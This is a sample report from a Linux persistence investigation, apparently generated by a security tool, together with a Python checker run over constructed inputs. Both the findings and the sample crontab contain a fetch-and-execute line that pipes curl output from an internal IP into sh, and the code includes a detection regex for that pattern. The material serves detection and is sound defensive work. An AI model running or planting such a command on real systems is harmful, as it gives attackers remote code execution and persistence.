# Sample Report: Linux Server Persistence Investigation
This is an anonymized sample report generated by WraithRun showing what output looks like for a persistence-focused investigation on a Linux host.
## Run Metadata
- Task: "Investigate potential unauthorized persistence mechanisms on the production web server"
- Mode: dry-run
- Model tier: Basic (deterministic)
- Duration: 2.3s
- Tools executed: 4 of 8
## Final Answer
Investigation complete. Found 5 findings across 4 severity levels. The host shows signs of unauthorized persistence including a suspicious systemd service and a recently modified crontab entry. Recommend immediate review of the identified entries and comparison with approved change records.
## Findings
### 1. High — Unrecognized systemd service `metrics-collector.service`

- Confidence: Likely (75%)
- Evidence: `inspect_persistence_locations` (turn 1) found a service unit file at `/etc/systemd/system/metrics-collector.service` that was created 5 days ago. The service runs `/opt/.cache/mc-agent`, which is not in the approved software inventory.
- Recommended action: Disable the service immediately (`systemctl disable metrics-collector`), quarantine the binary, compute its SHA-256 hash, and check it against threat intelligence feeds. Review the service file for any network-related configuration.
### 2. High — Modified crontab for user `www-data`

- Confidence: Likely (75%)
- Evidence: `inspect_persistence_locations` (turn 1) detected a crontab entry for `www-data` that runs `curl -s http://10.0.5.88:8443/check | sh` every 6 hours. The entry was added after the last approved deployment.
- Recommended action: Remove the crontab entry. Investigate the target IP `10.0.5.88` — determine whether it is an internal host or attacker infrastructure. Check web server logs for the same IP.
### 3. Medium — SSH authorized key for root with no comment

- Confidence: Possible (50%)
- Evidence: `inspect_persistence_locations` (turn 1) found an SSH public key in `/root/.ssh/authorized_keys` with no identifying comment. The key fingerprint does not match any team member keys on record.
- Recommended action: Remove the unrecognized key. Rotate all root-level SSH keys. Review the `sshd` configuration to ensure `PermitRootLogin` is set to `prohibit-password` or `no`.
### 4. Low — No suspicious network listeners detected

- Confidence: Informational (25%)
- Evidence: `scan_network` (turn 2) found 12 listening sockets, all matching expected services (sshd:22, nginx:80, nginx:443, postgres:5432, node:3000, and system services).
- Recommended action: No immediate action. Continue monitoring for new listeners.
### 5. Info — Process-network correlation nominal

- Confidence: Informational (25%)
- Evidence: `correlate_process_network` (turn 3) mapped all 47 active connections to known processes. No orphaned connections or unexpected outbound destinations.
- Recommended action: No action needed. Archive the baseline for future comparison.
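The three persistence indicators in findings 1 to 3, together with the `PermitRootLogin` check from finding 3, can be reproduced with a small stand-alone checker. The script below is an added example for this page; it is not WraithRun's code and not the tool's actual implementation. All inputs (the approved-software inventory, the unit files, the crontab, the `authorized_keys` content and the `sshd_config` fragment) are constructed sample data that mirror the findings above, not files read from a real host.

```python
"""Added example (not WraithRun code): re-check the persistence indicators
from findings 1-3 against constructed sample inputs."""
import re

# Constructed approved-software inventory (hypothetical for this example).
APPROVED_EXEC_PATHS = {
    "/usr/sbin/nginx",
    "/usr/bin/node",
    "/usr/lib/postgresql/14/bin/postgres",
}

# Constructed unit files keyed by path; one mirrors finding 1.
SAMPLE_UNITS = {
    "/etc/systemd/system/metrics-collector.service":
        "[Unit]\nDescription=Metrics\n[Service]\nExecStart=/opt/.cache/mc-agent --daemon\n",
    "/etc/systemd/system/nginx.service":
        "[Service]\nExecStart=/usr/sbin/nginx -g 'daemon on;'\n",
}

# Constructed crontab for www-data; the first entry mirrors finding 2.
SAMPLE_CRONTAB = """# www-data crontab (constructed sample)
0 */6 * * * curl -s http://10.0.5.88:8443/check | sh
15 3 * * * /usr/local/bin/rotate-logs.sh
"""

# Constructed authorized_keys; key material is filler, not real keys.
SAMPLE_AUTHORIZED_KEYS = """ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyDataOnlyForTesting000000000 alice@laptop
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAnotherConstructedKeyDataForTesting0000
"""

# Constructed sshd_config fragment with a weak setting after a commented-out line.
SAMPLE_SSHD_CONFIG = """Port 22
# PermitRootLogin no   (commented out: must be ignored)
PermitRootLogin yes
"""


def unapproved_units(units):
    """Return unit paths whose ExecStart binary is not in the approved inventory."""
    flagged = []
    for path, text in units.items():
        # systemd allows prefix characters (-, @, +, !, :) before the executable.
        m = re.search(r"^ExecStart=[-@+!:]*(\S+)", text, re.MULTILINE)
        if m and m.group(1) not in APPROVED_EXEC_PATHS:
            flagged.append(path)
    return flagged


# A download tool whose output is piped straight into a shell.
REMOTE_PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")


def remote_pipe_cron_entries(crontab_text):
    """Return crontab lines that fetch remote content and pipe it to a shell."""
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        if REMOTE_PIPE_TO_SHELL.search(line):
            hits.append(line)
    return hits


def keys_without_comment(authorized_keys_text):
    """Return 'keytype <key prefix>...' for entries that carry no comment field."""
    flagged = []
    for line in authorized_keys_text.splitlines():
        parts = line.split()
        if len(parts) < 2 or line.startswith("#"):
            continue
        # Format: [options] keytype base64-key [comment]; options precede the keytype.
        idx = next((i for i, p in enumerate(parts)
                    if p.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None:
            continue
        if len(parts) <= idx + 2:  # nothing follows the key material
            flagged.append(f"{parts[idx]} {parts[idx + 1][:16]}...")
    return flagged


def effective_permit_root_login(sshd_config_text):
    """sshd honours the first uncommented occurrence; the default is prohibit-password."""
    for line in sshd_config_text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        m = re.match(r"(?i)PermitRootLogin\s+(\S+)", s)
        if m:
            return m.group(1).lower()
    return "prohibit-password"


def root_login_is_hardened(sshd_config_text):
    """True when PermitRootLogin is one of the two values finding 3 recommends."""
    return effective_permit_root_login(sshd_config_text) in ("no", "prohibit-password")


def run_checks():
    """Run every check over the constructed samples and return the results."""
    return {
        "unapproved_units": unapproved_units(SAMPLE_UNITS),
        "remote_pipe_cron": remote_pipe_cron_entries(SAMPLE_CRONTAB),
        "keys_without_comment": keys_without_comment(SAMPLE_AUTHORIZED_KEYS),
        "permit_root_login": effective_permit_root_login(SAMPLE_SSHD_CONFIG),
    }


if __name__ == "__main__":
    for name, result in run_checks().items():
        print(f"{name}: {result}")
```

On a real host the sample strings would be replaced by the contents of `/etc/systemd/system/*.service`, the output of `crontab -l -u www-data`, `/root/.ssh/authorized_keys` and `/etc/ssh/sshd_config`; the `PermitRootLogin` check deliberately skips commented lines and stops at the first live directive, because that is the value sshd actually applies.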
## Investigation Steps
| Step | Tool | Duration |
|---|---|---|
| 1 | inspect_persistence_locations | 450ms |
| 2 | scan_network | 120ms |
| 3 | correlate_process_network | 380ms |
| 4 | audit_account_changes | 290ms |
## Severity Distribution
| Severity | Count |
|---|---|
| Critical | 0 |
| High | 2 |
| Medium | 1 |
| Low | 1 |
| Info | 1 |